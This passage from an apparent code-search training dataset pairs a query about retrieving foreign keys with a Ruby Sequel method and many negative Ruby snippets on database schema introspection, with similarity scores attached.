"0.5217813",
"0.51730186",
"0.5172916",
"0.5172916",
"0.5124813",
"0.51057416",
"0.5103544",
"0.50639737",
"0.5041395",
"0.5014041",
"0.49999535",
"0.49849275",
"0.49460497",
"0.49194357",
"0.4892625",
"0.48609218",
"0.48561966",
"0.48511145",
"0.48502496",
"0.48414615",
"0.4831207",
"0.48264015",
"0.48214692",
"0.48185122",
"0.48176077",
"0.47626162",
"0.47471645",
"0.47102425",
"0.47073776",
"0.46992496",
"0.46979013",
"0.4687194",
"0.46782422",
"0.46666813",
"0.46634394",
"0.46540147",
"0.46455425",
"0.46391317",
"0.46328416",
"0.46257684",
"0.4621453",
"0.46141347",
"0.46141347",
"0.46141347",
"0.4607217",
"0.45974234",
"0.45864815",
"0.45838338",
"0.45769262",
"0.4576863",
"0.45521998",
"0.4543986",
"0.45427915",
"0.45422795",
"0.45369127",
"0.4535537",
"0.4535537",
"0.45306906",
"0.452695",
"0.45234308",
"0.45234308",
"0.45234308",
"0.45234308",
"0.4513258",
"0.45108852",
"0.4505121",
"0.45020738",
"0.4492718",
"0.44913992",
"0.44847405",
"0.4483764",
"0.44759196",
"0.44740388",
"0.4473311",
"0.44715884",
"0.44642732",
"0.44591695"
] |
0.7300358
|
0
|
Dataset used to retrieve foreign keys referenced by a table
|
def _foreign_key_list_ds
@_foreign_key_list_ds ||= __foreign_key_list_ds(false)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n schema, _ = opts.fetch(:schema, schema_and_table(table))\n\n h = {}\n fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP \n reverse = opts[:reverse]\n\n (reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|\n if reverse\n key = [row[:schema], row[:table], row[:name]]\n else\n key = row[:name]\n end\n\n if r = h[key]\n r[:columns] << m.call(row[:column])\n r[:key] << m.call(row[:refcolumn])\n else\n entry = h[key] = {\n :name=>m.call(row[:name]),\n :columns=>[m.call(row[:column])],\n :key=>[m.call(row[:refcolumn])],\n :on_update=>fklod_map[row[:on_update]],\n :on_delete=>fklod_map[row[:on_delete]],\n :deferrable=>row[:deferrable],\n :table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),\n }\n\n unless schema\n # If not combining schema information into the :table entry\n # include it as a separate entry.\n entry[:schema] = m.call(row[:schema])\n end\n end\n end\n\n h.values\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
"def foreign_keys\n vals = []\n foreign_key_fields.each do |field|\n vals << self.send(field)\n end\n vals\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def collect_foreign_key_references(metadata, foreign_keys, row)\n schema = metadata.tableSchema\n\n # Add row as foreignKey source\n Array(schema ? schema.foreignKeys : []).each do |fk|\n colRef = Array(fk['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n (fk[:reference_from] ||= {})[cell_values] ||= row\n end\n\n # Add row as foreignKey dest\n Array(foreign_keys).each do |fk|\n colRef = Array(fk['reference']['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n fk[:reference_to] ||= {}\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n log_error \"Table #{metadata.url} row #{row.number}(src #{row.sourceNumber}): found duplicate foreign key target: #{cell_values.map(&:to_s).inspect}\" if fk[:reference_to][cell_values]\n fk[:reference_to][cell_values] ||= row\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
"def find_relations\n sql = <<-eos\n SELECT\n tc.constraint_name, tc.table_name, kcu.column_name,\n ccu.table_name AS foreign_table_name,\n ccu.column_name AS foreign_column_name\n FROM\n information_schema.table_constraints AS tc\n JOIN information_schema.key_column_usage AS kcu ON tc.constraint_name = kcu.constraint_name\n JOIN information_schema.constraint_column_usage AS ccu ON ccu.constraint_name = tc.constraint_name\n WHERE constraint_type = 'FOREIGN KEY'\n eos\n @relations = @connection.exec(sql).values\n end",
"def foreign_keys\n @foreign_keys ||= connection.foreign_keys(table_name, \"#{name} Foreign Keys\")\n end",
"def foreign_key\n meta(foreign_key: true)\n end",
"def scaf_foreign_keys\n scaf_belongs_tos.collect(&:primary_key_name)\n end",
"def record_foreign_keys(parent_record)\n association_foreign_keys(parent_record)\n end",
"def tables_with_referential_integrity\n schemas_and_tables = select_rows <<-SQL.strip_heredoc\n SELECT s.name, o.name\n FROM sys.foreign_keys i\n INNER JOIN sys.objects o ON i.parent_object_id = o.OBJECT_ID\n INNER JOIN sys.schemas s ON o.schema_id = s.schema_id\n SQL\n schemas_and_tables.map do |schema_table|\n schema, table = schema_table\n \"#{SQLServer::Utils.quoted_raw(schema)}.#{SQLServer::Utils.quoted_raw(table)}\"\n end\n end",
"def foreign_key_fields\n keys = []\n database_field_names.each do |param|\n if self.send(param).is_a? ForeignKey\n keys << param\n end\n end\n keys\n end",
"def _reverse_foreign_key_list_ds\n @_reverse_foreign_key_list_ds ||= __foreign_key_list_ds(true)\n end",
"def association_foreign_keys(assoc_record)\n association_foreign_keys_names.map { |name| assoc_record.public_send(name) }\n end",
"def associations_foreigns\n _reflections.map do |_, reflection|\n cols = [reflection.foreign_key]\n cols << reflection.foreign_type if reflection.polymorphic?\n cols\n end.flatten\n end",
"def references_with_foreign_key(*args)\n # Don't pop, unlike extract_options!, because we need to leave *args intact.\n options = args.last.is_a?(::Hash) ? args.last : {}\n polymorphic = options.has_key? :polymorphic\n\n references_without_foreign_key *args\n\n # Now we discard any options.\n options = args.extract_options! \n\n unless polymorphic\n args.each do |column|\n @@foreign_keys << [\"#{column}_id\", options]\n end\n end\n end",
"def dataset_key\n :id\n end",
"def foreign_key\n association.foreign_key \n end",
"def foreign_properties\n to_h.slice(*foreign_keys + foreign_objects)\n end",
"def hash_fk_model\n foreign_keys = {}\n @model_class.reflect_on_all_associations(:belongs_to).map{ |r|\n foreign_keys[r.association_foreign_key.to_sym] = r.name\n }\n foreign_keys\n end",
"def foreign_keys(*partition_key_values)\n return collect_from_collection(*partition_key_values, &:foreign_keys).inject(Set.new) do |set,new_items|\n if new_items.is_a? Array\n set += new_items\n else\n set += [new_items]\n end\n set\n end\n end",
"def excluded_foreign_key_names\r\n excluded_dimension_relations = prejoined_fields.keys.collect {|k| dimension_relationships[k]}\r\n excluded_dimension_relations.collect {|r| r.foreign_key}\r\n end",
"def references(current_table)\r\n references = []\r\n tables = get_tables\r\n tables.each do |table|\r\n columns = get_column_names(table)\r\n columns.each do |column|\r\n if /[_id]$/.match(column)\r\n references << table if column.split('_id').join == current_table\r\n end\r\n end\r\n end\r\n references\r\n end",
"def foreign_keys(table_name, stream)\n if (foreign_keys = @connection.foreign_keys(table_name)).any?\n add_foreign_key_statements = foreign_keys.map do |foreign_key|\n options = foreign_key.options\n table_from_key = foreign_key.to_table\n statement_parts = [ ('add_foreign_key ' + foreign_key.from_table.inspect) ]\n statement_parts << table_from_key.inspect\n statement_parts << (':name => ' + options[:name].inspect)\n\n column_from_options = options[:column]\n primary_key_from_options = options[:primary_key]\n dependent_from_options = options[:dependent]\n\n if column_from_options != \"#{table_from_key.singularize}_id\"\n statement_parts << (\":column => #{column_from_options.inspect}\")\n end\n if primary_key_from_options != 'id'\n statement_parts << (\":primary_key => #{primary_key_from_options.inspect}\")\n end\n if dependent_from_options.present?\n statement_parts << (\":dependent => #{dependent_from_options.inspect}\")\n end\n\n # Always exclude the index\n # If an index was created in a migration, it will get dumped to the schema\n # separately from the foreign key. This will raise an exception if\n # add_foreign_key is run without :exclude_index => true.\n statement_parts << (':exclude_index => true')\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_foreign_key_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def dump_table_foreign_keys(table, options=OPTS)\n if supports_foreign_key_parsing?\n fks = foreign_key_list(table, options).sort_by{|fk| fk[:columns]}\n end\n\n if fks.nil? || fks.empty?\n ''\n else\n dump_add_fk_constraints(table, fks)\n end\n end",
"def association_dataset_for(object)\n condition = if can_have_associated_objects?(object)\n predicate_keys.zip(predicate_key_values(object))\n else\n false\n end\n\n associated_dataset.where(condition)\n end",
"def link_belongs_to(reflection)\n reflection.foreign_key.to_sym\n end",
"def to_sql_with_foreign_keys\n from_table = AirBlade::Migrations::SchemaStatements.table_name\n fks = @@foreign_keys.map{ |column, options| foreign_key_constraint from_table, column, options }\n [ to_sql_without_foreign_keys, fks ].reject{ |x| x.blank? }.join ', '\n end",
"def foreign_key\n association ? association.foreign_key : name\n end",
"def referenced_tables(tables)\n result = {}\n tables.each do |table|\n result[table] = []\n self.select_all(\"select reftabname from syscat.references where tabname = '#{table.upcase}'\").each do |row|\n result[table] << row['reftabname'].downcase\n end\n end\n result\n end",
"def index\n @foreign_keys = ForeignKey.all\n end",
"def import_foreign_keys( table )\n for opts in db.foreign_key_list( table.name )\n opts = opts.dup\n name = opts.delete( :name )\n columns = opts.delete( :columns )\n table_name = opts.delete( :table )\n opts.delete( :deferrable ) unless opts[ :deferrable ]\n table.add_foreign_key( columns, table_name, opts )\n end\n end",
"def fetch_reference_ids(table, row)\n attributes = {}\n table.reference_columns.each do |c|\n new_id = nil\n if row[c.name.to_s].is_a?(Array)\n new_id = []\n row[c.name.to_s].each do |old_id|\n new_id << no_sql_connection.get_id_using_pre_mongified_id(c.references.to_s, old_id)\n end\n else\n new_id = no_sql_connection.get_id_using_pre_mongified_id(c.references.to_s, row[c.name.to_s])\n end\n attributes.merge!(c.name => new_id) unless new_id.nil?\n end\n attributes\n end",
"def foreign_key\n self.name + \"_id\"\n end",
"def foreign_key(relation)\n detect { |attr| attr.foreign_key? && attr.target == relation }\n end",
"def dataset\n database[table_name]\n end",
"def get_keys\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n c.conname,\n c.contype,\n pg_get_constraintdef(c.oid)\n FROM\n pg_class r,\n pg_constraint c\n WHERE\n c.conrelid = r.oid\n AND c.contype IN ('f', 'p')\n AND r.relkind = 'r'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = {}\n results.map do |row|\n table, key, type, create_sql = row.split(/\\t/)\n hash[key] = {:table => table, :type => type == 'p' ? :primary_key : :foreign_key, :create_sql => create_sql}\n end\n hash\n end",
"def keys\n @table.keys.inject(@parent ? @parent.keys : []) do |res, k1|\n @table[k1].keys.inject(res) do |_res, k2|\n ref = make_reference(k1, k2)\n _res.include?(ref) ? _res : res << ref\n end\n end\n end",
"def _select_pk_ds\n @_select_pk_ds ||= metadata_dataset.\n from(:pg_class, :pg_attribute, :pg_index, :pg_namespace).\n where{[\n [pg_class[:oid], pg_attribute[:attrelid]],\n [pg_class[:relnamespace], pg_namespace[:oid]],\n [pg_class[:oid], pg_index[:indrelid]],\n [pg_index[:indkey].sql_subscript(0), pg_attribute[:attnum]],\n [pg_index[:indisprimary], 't']\n ]}.\n select{pg_attribute[:attname].as(:pk)}\n end",
"def datasets\n Dataset.order(:name).map_h {|d| DataRow.where(ward: self, dataset: d)}\n end",
"def essential_columns(model_class)\n model_class.reflect_on_all_associations.inject([@primary_key]) do |arr, assoc|\n if assoc.options[:dependent] && assoc.macro == :belongs_to\n arr << assoc.association_foreign_key\n end\n arr\n end\n end",
"def eager_loaded_ids(docs, metadata)\n if metadata.stores_foreign_key?\n docs.flat_map{ |doc| doc.send(metadata.foreign_key) }\n else\n docs.map(&:id)\n end\n end",
"def scaffold_foreign_key(reflection)\n get_key_array_safe(reflection.child_key).name\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def references(*args)\n options = args.extract_options!\n polymorphic = options.delete(:polymorphic)\n\n options[:referenced_table] = options.delete(:table)\n if options[:referenced_table] && polymorphic\n raise ArgumentError, \"not possible to create a foreign key on a polymorphic association\"\n end\n\n args.each do |col|\n column(\"#{col}_id\", :integer, options)\n foreign_key(\"#{col}_id\", options[:referenced_table], 'id') if options[:referenced_table]\n column(\"#{col}_type\", :string, polymorphic.is_a?(Hash) ? polymorphic : options) unless polymorphic.nil?\n end\n end",
"def foreign_key_choices\n choices = []\n foreign_keys.each do |foreign_key|\n choices << foreign_key.all_from_class\n end\n choices\n end",
"def foreign_key(*args)\n # get the name\n name = String===args[0] ? args.shift : \"fk_#{@relvar.name}_#{@relvar.foreign_keys.size}\"\n \n # get the attribute => key mapping\n raise \"Invalid foreign key definition #{args.inspect}\" unless \\\n args.size==1 and Hash===args[0] and \\\n args[0].size == 1\n mapping = args[0]\n \n # get the attributes now\n attributes = args[0].keys.flatten.collect{|a| @relvar.attribute(a, true)}\n \n # get the target now\n target = mapping.values[0]\n target = target.primary_key if Relvar === target\n raise \"Invalid foreign key #{name} for #{@relvar.name} (#{target.inspect})\" unless Key===target\n\n @relvar.add_foreign_key(name, attributes, target)\n end",
"def stores_foreign_key?; true; end",
"def reflection_to_foreign_keys!( reflection, foreign_key_list )\n reflection_to_foreign_keys( reflection ).each do |foreign_key|\n #skip if already in this list or the fk has already been uped in the db\n next if includes_foreign_key?( foreign_key, foreign_key_list ) ||\n existing_foreign_key?( foreign_key )\n foreign_key_list << foreign_key\n end\n end",
"def belongs_to_relations(ar_instance)\n\t\t\tcolumns = ar_instance.class.column_names\n\t\t\tparents = columns.map{ |c| c if c =~ /_id/ }.reject{ |c| c.nil? }\n\t\t\tparents.map!{ |parents| parents.gsub('_id', '') }\n\t\tend",
"def foreigns\n []\n end",
"def foreign_key\n @resource_options.fetch :foreign_key,\n :\"#{tools.string.singularize association_name}_id\"\n end",
"def fk_join_arr\n result = []\n groups.each_with_index do |group, idx|\n group_alias = \"#{group.parent_table}_#{idx}\"\n group_query = group_query_builder(group)\n result.push \"JOIN (\\n#{group_query}\\n\\t) AS #{group_alias}_fk\"\n result.push \"ON #{group_alias}_fk.#{FKEYS[group.parent_table]}=#{group.parent_table}.#{group.parent_table_pk}\"\n if idx > 0\n groups.each_with_index do |x_group, x_idx|\n #next if x_idx < idx\n x_group_alias = \"#{x_group.parent_table}_#{x_idx}\"\n result.push \"\\tAND #{x_group_alias}_fk.year = #{group_alias}_fk.year\"\n break\n end\n end\n end\n return result\n end",
"def foreign_key(*attributes)\n self.foreign_keys += attributes\n end",
"def related_data\n @resource.related_identifiers.where(verified: true).where(hidden: false).map do |ri|\n { relation: ri.relation_type_friendly&.camelize(:lower), identifier: ri.related_identifier }\n end || []\n end",
"def primary_key_and_all_references_to_uuid(table, seed: nil)\n fk_specs = foreign_keys_into(table)\n\n drop_foreign_keys(fk_specs)\n\n primary_key_to_uuid(table, seed: seed)\n\n fk_specs.each do |fk_spec|\n columns_to_uuid fk_spec[:from_table], fk_spec[:column], seed: seed\n end\n\n create_foreign_keys(fk_specs.deep_dup)\n end",
"def association_keys\n association\n .__send__(:join_key_map, container.relations)\n end",
"def has_many_relations(ar_instance)\n\t\t\tcolumn_name = \"#{ar_instance.class.name.underscore}_id\"\n\t\t\tdescendents = ActiveRecord::Base.connection.tables\n\t\t\tdescendents.reject!{ |table| false unless table.classify.constantize rescue true }\n\t\t\tdescendents.reject!{ |table| true unless table.classify.constantize.column_names.include?(column_name) }\n\t\tend",
"def relation_foreign_key(relation)\n relation_reflect(relation).foreign_key\n end",
"def sub_querier_keys()\n ret = @columnNames\n ret << :user_id\n ret << :milestone_id\n return ret\n end",
"def foreign_key\n @foreign_key ||= (@options[:foreign_key] || \"#{@name}_id\").to_s\n end",
"def association_attributes\n outgoing_reflections.values.map { |reflection| reflection.foreign_key.to_s }\n end",
"def active_record_has_and_belongs_to_many(model, relation)\n return [] unless relation.macro == :has_and_belongs_to_many\n\n dump_proxy_table(model, relation)\n end",
"def column_references_table_constraint_sql(constraint)\n \"FOREIGN KEY #{literal(constraint[:columns])}#{column_references_sql(constraint)}\"\n end",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for?(record)\n foreign_key = Array(reflection.foreign_key)\n foreign_key.all? { |key| record._has_attribute?(key) }\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments[1].to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n if @foreign_keys[table_name].delete(\"#{$1}_type\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n elsif foreign_key_column =~ /(.*?)_type$/\n if @foreign_keys[table_name].delete(\"#{$1}_id\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n end\n end",
"def foreign_key(clazz=nil)\n @foreign_key || begin\n if @type == :t_belongs_to\n belongs_to_foreign_key\n elsif @type == :t_has_one || @type == :t_has_many\n has_x_foreign_key(clazz)\n end\n end\n end",
"def reverse_foreign_keys\n connection.reverse_foreign_keys(table_name, \"#{name} Reverse Foreign Keys\")\n end",
"def table_ref(t)\n case t\n when Dataset\n t.to_table_reference\n when Hash\n t.map {|k, v| \"#{table_ref(k)} #{table_ref(v)}\"}.join(COMMA_SEPARATOR)\n when Symbol\n symbol_to_column_ref(t)\n when String\n quote_identifier(t)\n else\n literal(t)\n end\n end",
"def associations\n association_ids = model.association_field_ids\n data.select{|k,v| association_ids.include?(k.to_s) }\n end",
"def foreign_key?\n @ref_table ? true : false\n end",
"def keys\n @keys ||= [column_for_order_by(relation), primary_key].compact.uniq\n end",
"def stores_foreign_key?; false; end",
"def stores_foreign_key?; false; end",
"def preload_belongs_to(connection, records, relation, as:)\n belonging_column = relation.belonging_column.to_sym\n having_column = relation.having_column.to_sym\n\n foreign_ids = H.pluck(records, belonging_column).uniq.compact\n\n scope = connection.scope(table: relation.having_table)\n scope = scope.where(having_column => foreign_ids)\n\n recs = connection.all(scope, into: Hash)\n recs_by_id = H.by_key(recs, having_column)\n\n records.each do |model|\n model[as] = recs_by_id[model.fetch(belonging_column)]\n end\n end",
"def association_key\n table[association_key_name]\n end",
"def referenced_by\n values = super\n values = Deepblue::MetadataHelper.ordered( ordered_values: referenced_by_ordered, values: values )\n return values\n end",
"def foreign_key_for(association)\n model_instance[association.foreign_key_column_name]\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments.all.first.to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_type\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = foreign_key_column\n elsif foreign_key_column =~ /(.*?)_type$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_id\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = \"#{Regexp.last_match(1)}_id\"\n end\n\n if foreign_id_column\n index_node = node.arguments.all.last.hash_value('index')\n if index_node.present? && (index_node.to_s != 'false')\n @index_columns[table_name] ||= []\n @index_columns[table_name] << foreign_id_column\n end\n end\n end",
"def primary_keys(table)\n pks = query(<<-end_sql, 'SCHEMA')\n SELECT DISTINCT attr.attname\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n pks.present? ? pks[0] : pks\n end",
"def build_id_constraint(reflection, keys, value, table = nil, bind_param = false)\n table ||= reflection.aliased_table\n value, binds = build_binds_for_constraint(reflection, value, keys.foreign_key) \\\n if bind_param\n\n [reflection.build_id_constraint(table[keys.key], value), binds]\n end",
"def children_table; end",
"def _check_constraints_ds\n @_check_constraints_ds ||= metadata_dataset.\n from{pg_constraint.as(:co)}.\n left_join(Sequel[:pg_attribute].as(:att), :attrelid=>:conrelid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n where(:contype=>'c').\n select{[co[:conname].as(:constraint), att[:attname].as(:column), pg_get_constraintdef(co[:oid]).as(:definition)]}\n end",
"def get_parent_relation_keys(parent)\n parents = Array(parent)\n\n reflect_on_all_associations.inject([]) do |result, relation|\n result << relation.foreign_key if parents.include?(relation.name)\n\n result\n end\n end",
"def hash_fk_model\n raise NotImplementedError\n end",
"def hash_fk_model\n raise NotImplementedError\n end",
"def table\n association.table_name\n end",
"def extract_dbc_data\n tabledata = {}\n\n curt = nil\n @db.each do |r|\n unless r.nil?\n if r.objecttype == \"Table\"\n # This is a related table\n tabledata[r.objectid] = {name: r.objectname, fields: []}\n elsif r.objecttype == \"Field\"\n # This is a related field. The parentid points to the table object\n\n # create using the parentid if the parentid is still unknown.\n tabledata[r.parentid] = {name: \"UNKNOWN\", fields: []} unless tabledata.has_key?(r.parentid)\n tabledata[r.parentid][:fields] << r.objectname\n end\n end\n end\n\n # now we need to transform the resulting array-hash to a direct mapping (changed to support older Ruby versions)\n # { tablename => [fieldnames] }\n @tables = {}\n tabledata.each{|k, v| @tables[v[:name]] = v[:fields] }\n end",
"def combine_polymorphic_foreign_keys\n @index_columns.each do |_table, foreign_keys|\n foreign_id_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_id/ }\n foreign_type_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_type/ }\n foreign_id_keys.each do |id_key|\n next unless type_key =\n foreign_type_keys.detect { |type_key| type_key.first == id_key.first.sub(/_id/, '') + '_type' }\n\n foreign_keys.delete(id_key)\n foreign_keys.delete(type_key)\n foreign_keys << id_key + type_key\n end\n end\n end",
"def non_foreign_key_values\n vals = []\n non_foreign_key_fields.each do |field|\n vals << self.send(field)\n end\n vals\n end",
"def scaf_foreign_key_name( assoc )\n assoc.primary_key_name\n end",
"def schema_ds_join(table_name, opts)\n [:information_schema__columns, {:table_catalog=>:table_catalog,\n :table_schema => :table_schema, :table_name => :table_name} , :c]\n end"
] |
[
"0.7179927",
"0.69182503",
"0.6904587",
"0.68861365",
"0.68154234",
"0.66139185",
"0.6553873",
"0.6553873",
"0.65525526",
"0.6544885",
"0.6445108",
"0.6381183",
"0.63455",
"0.63219166",
"0.6265057",
"0.62337005",
"0.62207776",
"0.61979944",
"0.6148675",
"0.6110326",
"0.60827583",
"0.60564655",
"0.6043439",
"0.6023383",
"0.6009314",
"0.59862787",
"0.59837306",
"0.5972757",
"0.58675766",
"0.5862392",
"0.5854458",
"0.58401364",
"0.5829467",
"0.582849",
"0.5794386",
"0.57919306",
"0.5790232",
"0.57799715",
"0.57634336",
"0.5743335",
"0.57425535",
"0.5731835",
"0.57281166",
"0.5695528",
"0.5685387",
"0.5674788",
"0.56739837",
"0.56635654",
"0.56635654",
"0.56616515",
"0.56373096",
"0.5631322",
"0.5624292",
"0.5619909",
"0.5615421",
"0.5607563",
"0.55935884",
"0.55833447",
"0.55681384",
"0.556693",
"0.5560387",
"0.5557153",
"0.555466",
"0.55297536",
"0.5529462",
"0.552525",
"0.5513466",
"0.5507957",
"0.549369",
"0.549133",
"0.5483819",
"0.5483819",
"0.54731864",
"0.54661566",
"0.54623175",
"0.5459045",
"0.54455847",
"0.5440195",
"0.5432439",
"0.54126704",
"0.5399339",
"0.5399339",
"0.5386515",
"0.5373706",
"0.53713787",
"0.536924",
"0.53689235",
"0.5367784",
"0.53553796",
"0.5354833",
"0.53332734",
"0.5331446",
"0.5328804",
"0.5328804",
"0.53238046",
"0.5321366",
"0.5309996",
"0.53029394",
"0.52959734",
"0.5295875"
] |
0.670528
|
5
|
Dataset used to retrieve foreign keys referencing a table
|
def _reverse_foreign_key_list_ds
@_reverse_foreign_key_list_ds ||= __foreign_key_list_ds(true)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), 